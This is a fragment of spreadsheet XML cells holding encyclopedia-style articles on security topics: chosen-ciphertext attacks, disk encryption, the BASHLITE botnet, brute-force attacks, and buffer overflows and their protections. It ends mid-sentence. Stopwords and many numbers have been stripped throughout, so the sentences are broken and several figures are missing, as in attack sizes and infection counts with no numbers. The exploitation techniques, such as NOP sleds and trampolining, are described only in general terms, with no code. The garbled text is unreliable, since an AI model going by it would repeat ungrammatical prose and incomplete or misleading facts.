    <t>adaptive chosen-ciphertext attack (abbreviated cca2) interactive form chosen-ciphertext attack attacker first sends number ciphertexts decrypted chosen adaptively, uses results distinguish target ciphertext without consulting oracle challenge ciphertext. adaptive attack, attacker allowed adaptive queries asked target revealed (but target query disallowed). extending indifferent (non-adaptive) chosen-ciphertext attack (cca1) second stage adaptive queries allowed. charles rackoff simon defined cca2 suggested system building non-adaptive cca1 definition system moni naor moti yung (which first treatment chosen ciphertext attack immunity public systems). certain practical settings, goal attack gradually reveal information encrypted message, decryption itself. public-key systems, adaptive-chosen-ciphertexts generally applicable property ciphertext malleability ciphertext modified specific ways predictable effect decryption message. practical attacks adaptive-chosen-ciphertext attacks perhaps considered theoretical concern, manifested practice, 1998, daniel bleichenbacher (then bell laboratories) demonstrated practical attack systems using encryption concert pkcs#1 encoding function, including version secure sockets layer (ssl) protocol used thousands servers time.the bleichenbacher attacks, also known million message attack, took advantage flaws within pkcs function gradually reveal content encrypted message. doing requires sending several million test ciphertexts decryption device (e.g., ssl-equipped server). practical terms, means session exposed reasonable amount time, perhaps less. with slight variations, vulnerability still exists many modern servers, name "return bleichenbacher's oracle threat" (robot). preventing attacks order prevent adaptive-chosen-ciphertext attacks, necessary encryption encoding scheme limits ciphertext malleability proof security system. after theoretical foundation level development secure systems, number systems proposed random oracle model: common standard encryption optimal asymmetric encryption padding (oaep). unlike improvised schemes padding used early versions pkcs#1, oaep proven secure random oracle model, oaep incorporated pkcs#1 version published 1998 now-recommended encoding scheme, older scheme still supported recommended applications. however, golden standard security show system secure without relying random oracle idealization. mathematical model complexity-theoretic cryptography, security adaptive chosen-ciphertext attacks commonly modeled using ciphertext indistinguishability (ind-cca2). references</t>
  </si>
  <si>
    <t>Xtraview Encryption System</t>
  </si>
  <si>
    <t>xtraview video encryption system refers now-defunct patented "encryption" system used xtraview number services, including setanta sports, television babestation unlike encryption system used mediaguard, xtraview video encryption system true encryption system. instead, mheg application directed user's set-top hidden videostream correct entered. unlike traditional channel encryption methods, xtraview require viewing card. this advantage digital terrestrial television vast majority set-top boxes ability decrypt channels. access channel protected using xtraview technology granted calling premium rate telephone number. during call, users asked give number displayed screen. response, given unlock service. 2011 similar system babestation xtreme, television briefly defunct tview digital terrestrial television. criticism system subject widespread hacking. without encryption, system easily circumvented set-top boxes able access individual videostreams individual stream pids entered. more recently, algorithm cracked, allowing others access service. another downfall application mheg generated, set-top switched off, access channels lost. also stated on-screen purchase boxes compatible. another factor cheaper boxes mheg support all, therefore cannot access service. external links homepage</t>
  </si>
  <si>
    <t>XtratuM</t>
  </si>
  <si>
    <t>xtratum bare-metal hypervisor specially designed embedded real-time systems available instruction sets leon2/3/4 (sparc v8), processors (tms570, a52, a53) risc processor. initially developed universidad politécnica valencia (spain). xtratum released free open-source software, subject requirements general public license (gpl), version later. version xtratum scratch (xtratum generation xng) commercialized fentiss proprietary license. qualified critical systems. xtratum hypervisor designed embedded systems meet safety critical real-time requirements. provides framework several operating systems real-time executives) robust partitioned environment. xtratum used build mils (multiple independent levels security) architecture. history name xtratum derives word stratum. geology related fields means: layer rock soil internally consistent characteristics distinguishes contiguous layers.in order stress tight relation linux open-source movements, replaced “x”. xtratum would first layer software (the closest hardware), provides solid basis rest system. xtratum initially designed substitution rtlinux (hardware abstraction layer) meet temporal spatial partitioning requirements. goal virtualize essential hardware devices execute several oses concurrently, least oses rtos. hardware devices (including booting) left special domain, named root domain. after experience, redesigned independent linux bootable. result xtratum type hypervisor uses para-virtualization. para-virtualized operations close hardware possible. therefore, porting operating system already works native system simple task: replace parts operating system corresponding hypercalls. overview design hypervisor critical real-time embedded systems follows criteria: strong temporal isolation: fixed cyclic scheduler. strong spatial isolation: partitions executed processor user mode, share memory. basic resource virtualization: clock timers, interrupts, memory, special devices. real-time scheduling policy partition scheduling. efficient context switch partitions. deterministic hypercalls (hypervisor system calls). health monitoring support. robust efficient inter-partition communication mechanisms (sampling queuing ports). overhead. small size. static system definition configuration file (xml).in case embedded systems, particularly avionics systems, arinc standard defines partitioning scheme. although standard designed describe hypervisor must operate, parts model quite close functionality provided hypervisor. xtratum internal operations resemble arinc standard. xtratum arinc compliant system. standard relies idea separation kernel defining operations partitions also threads processes managed inside partition. xtratum hypervisor supports leon 2/leon 3/leon (sparcv8) cortex r4/cortex r5/cortex (armv7) architectures. xtratum support execution environments: (xtratum abstraction layer) bare-c applications posix pse51 partikle rtos arinc-653 compliant lithos rtos arinc-653 compliant ulithos runtime ravenscar profile ork+ rtems linux also kernel-based virtual machine microkernels paravirtualization nanokernel references external links xtratum official page fentiss</t>
  </si>
  <si>
    <t>YaSSL</t>
  </si>
  <si>
    <t>Disk encryption software</t>
  </si>
  <si>
    <t>disk encryption software computer security software protects confidentiality data stored computer media (e.g., hard disk, floppy disk, device) using disk encryption. compared access controls commonly enforced operating system (os), encryption passively protects data confidentiality even active, example, data read directly hardware different addition crypto-shredding suppresses need erase data disk's lifecycle. disk encryption generally refers wholesale encryption operates entire volume mostly transparently user, system, applications. this generally distinguished file-level encryption operates user invocation single file group files, requires user decide specific files encrypted. disk encryption usually includes aspects disk, including directories, adversary cannot determine content, name size file. well suited portable devices laptop computers thumb drives particularly susceptible lost stolen. used properly, someone finding lost device cannot penetrate actual data, even know files might present. methods disk's data protected using symmetric cryptography randomly generated disk's encryption first established. this encrypted using password pass-phrase known (ideally) user. thereafter, order access disk's data, user must supply password make available software. this must done sometime operating system start-up encrypted data used. done software, encryption typically operates level applications system programs low-level device drivers "transparently" (from user's point view) encrypting data produced program physically written disk. conversely, decrypts data immediately read presented program. properly done, programs unaware cryptographic operations. some disk encryption software (e.g., truecrypt bestcrypt) provide features generally cannot accomplished disk hardware encryption: ability mount "container" files encrypted logical disks file system; encrypted logical "inner" volumes secretly hidden within free space obvious "outer" volumes. such strategies provide plausible deniability. well-known examples disk encryption software include: bitlocker windows; filevault apple os/x; luks standard free software mainly linux truecrypt, non-commercial freeware application, windows, os/x linux. 2008 study found data remanence dynamic random access memory (dram), data retention seconds minutes room temperature much longer times memory chips cooled temperature. study authors able demonstrate cold boot attack recover cryptographic keys several popular disk encryption systems despite memory degradation, taking advantage redundancy keys stored expanded efficient use. authors recommend computers powered down, rather left "sleep" state, physical control computer's legitimate owner. this method recovery, however, suited controlled laboratory settings extremely impractical "field" equipment cooling systems required. other features plausible deniability some disk encryption systems, veracrypt, ciphershed (active open source forks discontinued truecrypt project), bestcrypt (proprietary trialware), offers levels plausible deniability, might useful user compelled reveal password encrypted volume. hidden volumes hidden volumes steganographic feature allows second, "hidden", volume reside within apparent free space visible "container" volume (sometimes known "outer" volume). hidden volume separate file system, password, encryption distinct container volume. content hidden volume encrypted resides free space file system outer volume—space would otherwise filled random values hidden volume exist. when outer container brought online thorough disk encryption software, whether inner outer volume mounted depends password provided. "normal" password/key outer volume proves valid, outer volume mounted; password/key hidden volume proves valid, (and then) existence hidden volume even detected, mounted; otherwise password/key successfully decrypt either inner outer volume descriptors, neither mounted. once hidden volume created inside visible container volume, user store important-looking information (but user actually mind revealing) outer volume, whereas sensitive information stored within hidden volume. user forced reveal password, user reveal password outer volume, without disclosing existence hidden volume. hidden volume compromised, user takes certain precautions overwriting free areas "host" disk. identifying features volumes, stored file device/partition, intentionally contain discernible "signatures" unencrypted headers. cipher algorithms designed indistinguishable pseudorandom permutation without knowing key, presence data encrypted volume also undetectable unless known weaknesses cipher. this means impossible prove file partition encrypted volume (rather random data) without password mount this characteristic also makes impossible determine volume contains another hidden volume. file hosted volume opposed partitions) look place cases since entirely random data placed file intentionally. however, partition device hosted volume look different partition device wiped common disk wiping tool darik's boot nuke. plausibly claim device partition wiped clear personal data. portable "traveller mode" means encryption software without installation system hard drive. mode, software typically installs temporary driver portable media. since installing driver (albeit temporarily), administrative privileges still required. resizable volumes some disk encryption software allows encrypted volumes resized. many systems implement fully, resort using "sparse files" achieve this. backups encrypted volumes contain "header" "cdb") data, backed overwriting data destroy volume, ability back useful. restoring backup copy data reset volume's password backup taken. also disk encryption theory disk encryption hardware comparison disk encryption software data remanence disk encryption on-the-fly encryption cold boot attack single sign-on united states boucher references external links hard disk encryption curlie detailed wiki-style article disk encryption infoanarchy.org inside netbsds buyer's guide full disk encryption overview full-disk encryption, works, differs file-level encryption—plus overview leading full-disk encryption software.</t>
  </si>
  <si>
    <t>BASHLITE</t>
  </si>
  <si>
    <t>bashlite (also known gafgyt, lizkebab, pinkslip, qbot, torlus lizardstresser) malware infects linux systems order launch distributed denial-of-service attacks (ddos). originally also known name bashdoor, term refers exploit method used malware. used launch attacks gbps.the original version 2014 exploited flaw bash shell shellshock software exploit devices running busybox. months later variant detected could also infect vulnerable devices local network. 2015 source code leaked, causing proliferation different variants, 2016 reported million devices infected.of identifiable devices participating botnets august 2016 almost percent devices percent cameras dvrs), roughly percent home routers less percent compromised linux servers. design bashlite written designed easily cross-compile various computer architectures.exact capabilities differ variants, common features generate several different types ddos attacks: hold open connections, send random string junk characters port, repeatedly send packets specified flags. they also mechanism arbitrary shell commands infected machine. there facilities reflected amplification attacks. bashlite uses client–server model command control. protocol used communication essentially lightweight version internet relay chat (irc). even though supports multiple command control servers, variants single command control ip-address hardcoded. propagates brute forcing, using built-in dictionary common usernames passwords. malware connects random addresses attempts login, successful logins reported back command control server. also orbit cannon stress test tool used ddos attacks high orbit cannon replacement loic used ddos attacks denial-of-service attack (dos) fork bomb mirai (malware) hajime (malware) slowloris (computer security) redos references</t>
  </si>
  <si>
    <t>BEAM (Erlang virtual machine)</t>
  </si>
  <si>
    <t>beam virtual machine core erlang open telecom platform (otp). beam part erlang run-time system (erts), compiles erlang source code bytecode, executed beam. beam bytecode files .beam file extension.originally beam short bogdan's erlang abstract machine, named bogumil "bogdan" hausman, wrote original version, name also referred björn's erlang abstract machine, björn gustavsson, wrote maintains current version. both developers worked system ericsson.the predecessor beam (joe's abstract machine), first virtual machine erlang language written armstrong. also comparison application virtual machines register machine references external links erlang website history erlang erlang beam virtual machine specification, 1997 beam book erik stenman</t>
  </si>
  <si>
    <t>Brute-force attack</t>
  </si>
  <si>
    <t>cryptography, brute-force attack consists attacker submitting many passwords passphrases hope eventually guessing correctly. attacker systematically checks possible passwords passphrases correct found. alternatively, attacker attempt guess typically created password using derivation function. this known exhaustive search. brute-force attack cryptanalytic attack can, theory, used attempt decrypt encrypted data (except data encrypted information-theoretically secure manner). such attack might used possible take advantage weaknesses encryption system exist) would make task easier. when password-guessing, method fast used check short passwords, longer passwords methods dictionary attack used brute-force search takes long. longer passwords, passphrases keys possible values, making exponentially difficult crack shorter ones.brute-force attacks made less effective obfuscating data encoded making difficult attacker recognize code cracked making attacker work test guess. measures strength encryption system long would theoretically take attacker mount successful brute-force attack it.brute-force attacks application brute-force search, general problem-solving technique enumerating candidates checking one. basic concept brute-force attacks work calculating every possible combination could make password testing correct password. password's length increases, amount time, average, find correct password increases exponentially. theoretical limits resources required brute-force attack grow exponentially increasing size, linearly. although u.s. export regulations historically restricted lengths 56-bit symmetric keys (e.g. data encryption standard), restrictions longer place, modern symmetric algorithms typically computationally stronger 128- 256-bit keys. there physical argument 128-bit symmetric computationally secure brute-force attack. so-called landauer limit implied laws physics sets lower limit energy required perform computation erased computation, temperature computing device kelvins, boltzmann constant, natural logarithm 0.693. irreversible computing device less energy this, even principle. thus, order simply flip possible values 128-bit symmetric (ignoring actual computing check would, theoretically, require 2128 flips conventional processor. assumed calculation occurs near room temperature (≈300 neumann-landauer limit applied estimate energy required ≈1018 joules, equivalent consuming gigawatts power year. this equal 30×109 w×365×24×3600 9.46×1017 262.7 (about 0.1% yearly world energy production). full actual computation checking solution found would consume many times amount. furthermore, simply energy requirement cycling space; actual time takes flip considered, certainly greater (see bremermann's limit). however, argument assumes register values changed using conventional clear operations inevitably generate entropy. shown computational hardware designed encounter theoretical obstruction (see reversible computing), though computers known constructed. commercial successors governmental asic solutions become available, also known custom hardware attacks, emerging technologies proven capability brute-force attack certain ciphers. modern graphics processing unit (gpu) technology, field-programmable gate array (fpga) technology. gpus benefit wide availability price-performance benefit, fpgas energy efficiency cryptographic operation. both technologies transport benefits parallel processing brute-force attacks. case gpus hundreds, case fpga thousand processing units making much better suited cracking passwords conventional processors. various publications fields cryptographic analysis proved energy efficiency today's fpga technology, example, copacobana fpga cluster computer consumes energy single (600 performs like 2,500 certain algorithms. number firms provide hardware-based fpga cryptographic analysis solutions single fpga express card dedicated fpga computers. wpa2 encryption successfully brute-force attacked reducing workload factor comparison conventional cpus hundred case fpgas. advanced encryption standard (aes) permits 256-bit keys. breaking symmetric 256-bit brute force requires 2128 times computational power 128-bit key. fastest supercomputers 2019 speed petaflops could theoretically check million million (1014) keys second (assuming 1000 operations check), would still require 3.67×1055 years exhaust 256-bit space.an underlying assumption brute-force attack complete space used generate keys, something relies effective random number generator, defects algorithm implementation. example, number systems originally thought impossible crack brute force nevertheless cracked space search found much smaller originally thought, lack entropy pseudorandom number generators. these include netscape's implementation (famously cracked goldberg david wagner 1995) debian/ubuntu edition openssl discovered 2008 flawed. similar lack implemented entropy breaking enigma's code. credential recycling credential recycling refers hacking practice re-using username password combinations gathered previous brute-force attacks. special form credential recycling pass hash, unsalted hashed credentials stolen re-used without first brute forced. unbreakable codes certain types encryption, mathematical properties, cannot defeated brute force. example one-time cryptography, every cleartext corresponding truly random sequence bits. character one-time-pad-encoded string subjected brute-force attack would eventually reveal every character string possible, including correct answer answers given, would knowing correct one. defeating system, done venona project, generally relies pure cryptography, upon mistakes implementation: pads truly random, intercepted keypads, operators making mistakes errors. countermeasures case offline attack attacker access encrypted material, combinations without risk discovery interference. however database directory administrators take countermeasures online attacks, example limiting number attempts password tried, introducing time delays successive attempts, increasing answer's complexity (e.g. requiring captcha answer verification code sent cellphone), and/or locking accounts unsuccessful login attempts. website administrators prevent particular address trying predetermined number password attempts account site. reverse brute-force attack reverse brute-force attack, single (usually common) password tested multiple usernames encrypted files. process repeated select passwords. strategy, attacker targeting specific user. also bitcoin mining cryptographic length distributed.net derivation function md5crk metasploit express side-channel attack twinkle twirl unicity distance factoring challenge secure shell notes references external links rsa-sponsored des-iii cracking contest demonstration brute-force device designed guess passcode locked iphones running 10.3.3 cracked code book ciphers essay winning team challenge code book</t>
  </si>
  <si>
    <t>Buffalo AirStation</t>
  </si>
  <si>
    <t>buffalo airstation name given series wireless equipment sold buffalo technology. products residential gateways wireless cards third party firmware many buffalo's residential gateways broadcom microprocessor chipsets, allowing variety third party open source firmware installed. some recent routers atheros-based chipsets shipped buffalo branded version dd-wrt already installed. csiro controversy late november 2007, buffalo announced would temporarily stop supplying wireless products ongoing lawsuit filed 802.11a, 802.11g 802.11n patent holder csiro. buffalo routers series series series series series series series series series also list wireless router firmware projects references external links buffalo</t>
  </si>
  <si>
    <t>Buffalo network-attached storage series</t>
  </si>
  <si>
    <t>buffalo terastation network-attached storage series network-attached storage devices. current lineup includes linkstation terastation series. these devices undergone various improvements since first produced, expanded include windows storage server-based operating system. history terastation terastation network-attached storage device using powerpc architecture processor. many terastation models shipped enterprise-grade internal hard drives mounted raid array. since january 2012, terastation uses iscsi target. linkstation linkstation network-attached storage device using powerpc architecture processor designed personal use, aiming serve central media backup storage household. compared terastation series, linkstation devices typically offer streamlined media server features. current product lineup linkstation linkstation notable among linux community japan us/europe "hackable" generic linux appliance made tasks file storage sharing tasks designed. device runs linux, included changes linux source code, buffalo required release modified versions source code terms general public license. availability source code relatively cost device, several community projects centered around there main replacement firmware releases available device: first openlink based official buffalo firmware modifications features added. freelink, debian distribution. terastation like linkstation, terastation devices version linux, models windows storage server 2016. debian gentoo linux distributions netbsd reported ported operation device various iterations ships universal plug play protocol distribution multimedia stored device. also configured variety different media servers twonkyvision media server, slimserver/squeezecenter server, itunes server using digital audio access protocol, samba server, iscsi target, mldonkey client, well network file system server posix-based systems. backup server, modified rsync back synchronize data many computers network pushing data, even linkstation pulling data remote servers—beside buffalo-provided backup software windows. also found number ways, notably interface comes configured print server also common unix printing system printer. users managed number devices version linux kernel's enhanced support. additionally, apache http server software already installed purpose providing buffalo configuration screens, device easily converted lightweight server (with buffalo content deleted) serve content operator's choice. achievements linkstation terastation devices various industry awards since introduction, ts51210rh winning storage product year 2018 network computing awards. terastation also external storage hardware category crn® annual report card (arc) awards, recognizes exceptional vendor performance, three years row. gallery also nslu2 references</t>
  </si>
  <si>
    <t>Buffer over-read</t>
  </si>
  <si>
    <t>computer security programming, buffer over-read anomaly program, reading data buffer, overruns buffer's boundary reads tries read) adjacent memory. this special case violation memory safety. buffer over-reads triggered, heartbleed bug, maliciously crafted inputs designed exploit lack bounds checking read parts memory intended accessible. they also caused programming errors alone. buffer over-reads result erratic program behavior, including memory access errors, incorrect results, crash, breach system security. thus, basis many software vulnerabilities maliciously exploited access privileged information. programming languages commonly associated buffer over-reads include c++, provide built-in protection using pointers access data part virtual memory, automatically check reading data block memory safe; respective examples attempting read elements contained array, failing append trailing terminator null-terminated string. bounds checking prevent buffer over-reads, fuzz testing help detect them. also buffer overflow computer security type safety references external links dateinterval heap buffer overread denial service #66060: heap buffer over-read dateinterval</t>
  </si>
  <si>
    <t>Buffer overflow protection</t>
  </si>
  <si>
    <t>buffer overflow protection various techniques used software development enhance security executable programs detecting buffer overflows stack-allocated variables, preventing causing program misbehavior becoming serious security vulnerabilities. stack buffer overflow occurs program writes memory address program's call stack outside intended data structure, usually fixed-length buffer. stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer. this almost always results corruption adjacent data stack, could lead program crashes, incorrect operation, security issues. typically, buffer overflow protection modifies organization stack-allocated data includes canary value that, destroyed stack buffer overflow, shows buffer preceding memory overflowed. verifying canary value, execution affected program terminated, preventing misbehaving allowing attacker take control other buffer overflow protection techniques include bounds checking, checks accesses allocated block memory cannot beyond actually allocated space, tagging, ensures memory allocated storing data cannot contain executable code. overfilling buffer allocated stack likely influence program execution overfilling buffer heap stack contains return addresses active function calls. however, similar implementation-specific protections also exist heap-based overflows. there several implementations buffer overflow protection, including compiler collection, llvm, microsoft visual studio, compilers. overview stack buffer overflow occurs program writes memory address program's call stack outside intended data structure, usually fixed-length buffer. stack buffer overflow bugs caused program writes data buffer located stack actually allocated buffer. this almost always results corruption adjacent data stack, cases overflow triggered mistake, often cause program crash operate incorrectly. stack buffer overflow type general programming malfunction known buffer overflow buffer overrun). overfilling buffer stack likely derail program execution overfilling buffer heap stack contains return addresses active function calls.stack buffer overflow caused deliberately part attack known stack smashing. affected program running special privileges, accepts data untrusted network hosts (for example, public webserver), potential security vulnerability allows attacker inject executable code running program take control process. this oldest reliable methods attackers gain unauthorized access computer.typically, buffer overflow protection modifies organization data stack frame function call include "canary" value that, destroyed, shows buffer preceding memory overflowed. this provides benefit preventing entire class attacks. according researchers, performance impact techniques negligible. stack-smashing protection unable protect certain forms attack. example, cannot protect buffer overflows heap. there sane alter layout data within structure; structures expected modules, especially shared libraries. data structure buffer impossible protect canaries; thus, programmers must careful organize variables structures. canaries canaries canary words known values placed buffer control data stack monitor buffer overflows. when buffer overflows, first data corrupted usually canary, failed verification canary data therefore alert overflow, handled, example, invalidating corrupted data. canary value confused sentinel value. terminology reference historic practice using canaries coal mines, since would affected toxic gases earlier miners, thus providing biological warning system. canaries alternately known cookies, meant evoke image "broken cookie" value corrupted. there three types canaries use: terminator, random, random xor. current versions stackguard support three, propolice supports terminator random canaries. terminator canaries terminator canaries observation buffer overflow attacks based certain string operations string terminators. reaction observation canaries built null terminators, result, attacker must write null character writing return address avoid altering canary. this prevents attacks using strcpy() methods return upon copying null character, undesirable result canary known. even protection, attacker could potentially overwrite canary known value control information mismatched values, thus passing canary check code, executed soon specific processor's return-from-call instruction. random canaries random canaries randomly generated, usually entropy-gathering daemon, order prevent attacker knowing value. usually, logically possible plausible read canary exploiting; canary secure value known need know it—the buffer overflow protection code case. normally, random canary generated program initialization, stored global variable. this variable usually padded unmapped pages, attempting read using kinds tricks exploit bugs read cause segmentation fault, terminating program. still possible read canary, attacker knows program read stack. random canaries random canaries random canaries xor-scrambled using part control data. way, canary control data clobbered, canary value wrong. random canaries vulnerabilities random canaries, except "read stack" method getting canary complicated. attacker must canary, algorithm, control data order re-generate original canary needed spoof protection. addition, random canaries protect certain type attack involving overflowing buffer structure pointer change pointer point piece control data. because encoding, canary wrong control data return value changed. because pointer, control data return value changed without overflowing canary. although canaries protect control data altered clobbered pointers, protect data pointers themselves. function pointers especially problem here, overflowed execute shellcode called. bounds checking bounds checking compiler-based technique adds run-time bounds information allocated block memory, checks pointers run-time. c++, bounds checking performed pointer calculation time dereference time.implementations approach either central repository, describes allocated block memory, pointers, contain pointer additional data, describing region point tagging tagging compiler-based hardware-based (requiring tagged architecture) technique tagging type piece data memory, used mainly type checking. marking certain areas memory non-executable, effectively prevents memory allocated store data containing executable code. also, certain areas memory marked non-allocated, preventing buffer overflows. historically, tagging used implementing high-level programming languages; appropriate support operating system, tagging also used detect buffer overflows. example hardware feature, supported intel, processors. implementations compiler collection (gcc) stack-smashing protection first implemented stackguard 1997, published 1998 usenix security symposium. stackguard introduced patches intel backend 2.7. stackguard maintained immunix linux distribution 1998 2003, extended implementations terminator, random random canaries. stackguard suggested inclusion 2003 summit proceedings, never achieved. from 2001 2005, developed patches stack-smashing protection, known propolice. improved idea stackguard placing buffers local pointers function arguments stack frame. this helped avoid corruption pointers, preventing access arbitrary memory locations. engineers identified problems propolice though, 2005 re-implemented stack-smashing protection inclusion 4.1. this work introduced -fstack-protector flag, protects vulnerable functions, -fstack-protector-all flag, protects functions whether need not.in 2012, google engineers implemented -fstack-protector-strong flag strike better balance security performance. this flag protects kinds vulnerable functions -fstack-protector does, every function, providing better performance -fstack-protector-all. available since version 4.9.all fedora packages compiled -fstack-protector since fedora core -fstack-protector-strong since fedora most packages ubuntu compiled -fstack-protector since 6.10. every arch linux package compiled -fstack-protector since 2011. arch linux packages built since 2014 -fstack-protector-strong. stack protection used packages debian, freebsd base system since 8.0. stack protection standard certain operating systems, including openbsd, hardened gentoo dragonfly bsd. stackguard propolice cannot protect overflows automatically allocated structures overflow function pointers. propolice least rearrange allocation order structures allocated function pointers. separate mechanism pointer protection proposed pointguard available microsoft windows. microsoft visual studio compiler suite microsoft implements buffer overflow protection since version 2003 command-line switch, enabled default since version 2005. using /gs- disables protection. compiler stack-smashing protection turned compiler flag -qstackprotect. clang/llvm clang supports three buffer overflow detectors, namely addresssanitizer (-fsanitize=address), -fsanitize=bounds, safecode. these systems different tradeoffs terms performance penalty, memory overhead, classes detected bugs. stack protection standard certain operating systems, including openbsd. intel compiler intel's compiler supports stack-smashing protection options similar provided microsoft visual studio. fail-safe fail-safe open-source memory-safe ansi compiler performs bounds checking based pointers object-oriented memory access. stackghost (hardware-based) invented mike frantzen, stackghost simple tweak register window spill/fill routines makes buffer overflows much difficult exploit. uses unique hardware feature microsystems sparc architecture (that being: deferred on-stack in-frame register window spill/fill) detect modifications return pointers common exploit hijack execution paths) transparently, automatically protecting applications without requiring binary source modifications. performance impact negligible, less percent. resulting issues resolved mark kettenis years later, allowing enabling feature. following event, stackghost code integrated (and optimized) openbsd/sparc. canary example normal buffer allocation architectures similar architectures shown buffer overflow entry. here, show modified process pertains stackguard. when function called, stack frame created. stack frame built memory beginning; stack frame placed stack, closest beginning memory. thus, running piece data stack frame alters data previously entered stack frame; running stack frame places data previous stack frame. typical stack frame look below, return address (reta) placed first, followed control information (ctli). (ctli)(reta) function contain many different per-call data structures. each piece data created call placed stack frame order, thus ordered beginning memory. below hypothetical function stack frame. (d..)(c.........)(b...)(a...)(ctli)(reta) hypothetical situation, bytes written array character array excess overflow integer pointer integer control information, finally return address. overwriting pointer made reference position memory, causing read arbitrary address. overwriting reta, function made execute code (when attempts return), either existing functions (ret2libc) code written stack overflow. nutshell, poor handling unbounded strcpy() calls above, allow attacker control program influencing values assigned directly. goal buffer overflow protection detect issue least intrusive possible. this done removing harms placing sort tripwire, canary, buffer. buffer overflow protection implemented change compiler. such, possible protection alter structure data stack frame. this exactly case systems propolice. function's automatic variables rearranged safely: arrays allocated first stack frame, places integer integer pointer memory. stack frame becomes (b...)(a...)(d..)(c.........)(ctli)(reta) impossible move ctli reta without breaking produced code, another tactic employed. extra piece information, called "canary" (cnry), placed buffers stack frame. when buffers overflow, canary value changed. thus, effectively attack program, attacker must leave definite indication attack. stack frame (b...)(a...)(d..)(c.........)(cnry)(ctli)(reta) every function instruction continues execution memory address indicated reta. before instruction executed, check cnry ensures altered. value cnry fails test, program execution ended immediately. essence, deliberate attacks inadvertent programming bugs result program abort. canary technique adds instructions overhead every function call automatic array, immediately dynamic buffer allocation dynamic buffer deallocation. overhead generated technique significant. work, though, unless canary remains unchanged. attacker knows there, determine value canary, simply copy itself. this usually difficult arrange intentionally, highly improbable unintentional situations. position canary implementation specific, always buffers protected data. varied positions lengths varied benefits. also sentinel value (which confused canary value) control-flow integrity address space layout randomization executable space protection memory debugger static code analysis references external links 2003 summit proceedings (pdf) smashing stack profit aleph propolice official home immunix stackguard homepage original stackguard paper usenix security 1998 stackghost: hardware facilitated stack protection freebsd propolice implementation four different tricks bypass stackshield stackguard protection stack smashing protector</t>
  </si>
  <si>
    <t>Buffer overflow</t>
  </si>
  <si>
    <t>information security programming, buffer overflow, buffer overrun, anomaly program, writing data buffer, overruns buffer's boundary overwrites adjacent memory locations. buffers areas memory aside hold data, often moving section program another, programs. buffer overflows often triggered malformed inputs; assumes inputs smaller certain size buffer created size, anomalous transaction produces data could cause write past buffer. overwrites adjacent data executable code, result erratic program behavior, including memory access errors, incorrect results, crashes. exploiting behavior buffer overflow well-known security exploit. many systems, memory layout program, system whole, well defined. sending data designed cause buffer overflow, possible write areas known hold executable code replace malicious code, selectively overwrite data pertaining program's state, therefore causing behavior intended original programmer. buffers widespread operating system (os) code, possible make attacks perform privilege escalation gain unlimited access computer's resources. famed morris worm 1988 used attack techniques. programming languages commonly associated buffer overflows include c++, provide built-in protection accessing overwriting data part memory automatically check data written array (the built-in buffer type) within boundaries array. bounds checking prevent buffer overflows, requires additional code processing time. modern operating systems variety techniques combat malicious buffer overflows, notably randomizing layout memory, deliberately leaving space buffers looking actions write areas ("canaries"). technical description buffer overflow occurs data written buffer also corrupts data values memory addresses adjacent destination buffer insufficient bounds checking. this occur copying data buffer another without first checking data fits within destination buffer. example following example expressed program variables adjacent memory: 8-byte-long string buffer, two-byte big-endian integer, initially, contains nothing zero bytes, contains number 1979. now, program attempts store null-terminated string "excessive" ascii encoding buffer. "excessive" characters long encodes bytes including null terminator, take bytes. failing check length string, also overwrites value value inadvertently replaced number formed part character string. example followed zero byte would become 25856. writing data past allocated memory sometimes detected operating system generate segmentation fault error terminates process. prevent buffer overflow happening example, call strcpy could replaced strlcpy, takes maximum capacity (including null-termination character) additional parameter ensures amount data written when available, strlcpy library function preferred strncpy null-terminate destination buffer source string's length greater equal size buffer (the third argument passed function), therefore null-terminated cannot treated valid c-style string. exploitation techniques exploit buffer overflow vulnerability vary architecture, operating system memory region. example, exploitation heap (used dynamically allocated memory), differs markedly exploitation call stack. stack-based exploitation technically inclined user exploit stack-based buffer overflows manipulate program advantage several ways: overwriting local variable located near vulnerable buffer stack, order change behavior program overwriting return address stack frame point code selected attacker, usually called shellcode. once function returns, execution resume attacker's shellcode. overwriting function pointer exception handler point shellcode, subsequently executed overwriting local variable pointer) different stack frame, used function owns frame later.the attacker designs data cause exploits, places data buffer supplied users vulnerable code. address user-supplied data used affect stack buffer overflow unpredictable, exploiting stack buffer overflow cause remote code execution becomes much difficult. technique used exploit buffer overflow called "trampolining". technique, attacker find pointer vulnerable stack buffer, compute location shellcode relative pointer. then, overwrite jump instruction already memory make second jump, time relative pointer; second jump branch execution shellcode. suitable instructions often present large code. metasploit project, example, maintains database suitable opcodes, though lists found windows operating system. heap-based exploitation buffer overflow occurring heap data area referred heap overflow exploitable manner different stack-based overflows. memory heap dynamically allocated application run-time typically contains program data. exploitation performed corrupting data specific ways cause application overwrite internal structures linked list pointers. canonical heap overflow technique overwrites dynamic memory allocation linkage (such malloc meta data) uses resulting pointer exchange overwrite program function pointer. microsoft's gdi+ vulnerability handling jpegs example danger heap overflow present. barriers exploitation manipulation buffer, occurs read executed, lead failure exploitation attempt. these manipulations mitigate threat exploitation, make impossible. manipulations could include conversion upper lower case, removal metacharacters filtering non-alphanumeric strings. however, techniques exist bypass filters manipulations; alphanumeric shellcode, polymorphic code, self-modifying code return-to-libc attacks. methods used avoid detection intrusion detection systems. cases, including code converted unicode, threat vulnerability misrepresented disclosers denial service fact remote execution arbitrary code possible. practicalities exploitation real-world exploits variety challenges need overcome exploits operate reliably. these factors include null bytes addresses, variability location shellcode, differences environments various counter-measures operation. sled technique nop-sled oldest widely known technique exploiting stack buffer overflows. solves problem finding exact address buffer effectively increasing size target area. this, much larger sections stack corrupted no-op machine instruction. attacker-supplied data, no-op instructions, attacker places instruction perform relative jump buffer shellcode located. this collection no-ops referred "nop-sled" return address overwritten address within no-op region buffer, execution "slide" no-ops redirected actual malicious code jump end. this technique requires attacker guess stack nop-sled instead comparatively small shellcode.because popularity technique, many vendors intrusion prevention systems search pattern no-op machine instructions attempt detect shellcode use. important note nop-sled necessarily contain traditional no-op machine instructions; instruction corrupt machine state point shellcode used place hardware assisted no-op. result, become common practice exploit writers compose no-op sled randomly chosen instructions real effect shellcode execution.while method greatly improves chances attack successful, without problems. exploits using technique still must rely amount luck guess offsets stack within nop-sled region. incorrect guess usually result target program crashing could alert system administrator attacker's activities. another problem nop-sled requires much larger amount memory hold nop-sled large enough use. this problem allocated size affected buffer small current depth stack shallow (i.e., much space current stack frame start stack). despite problems, nop-sled often method work given platform, environment, situation, still important technique. jump address stored register technique "jump register" technique allows reliable exploitation stack buffer overflows without need 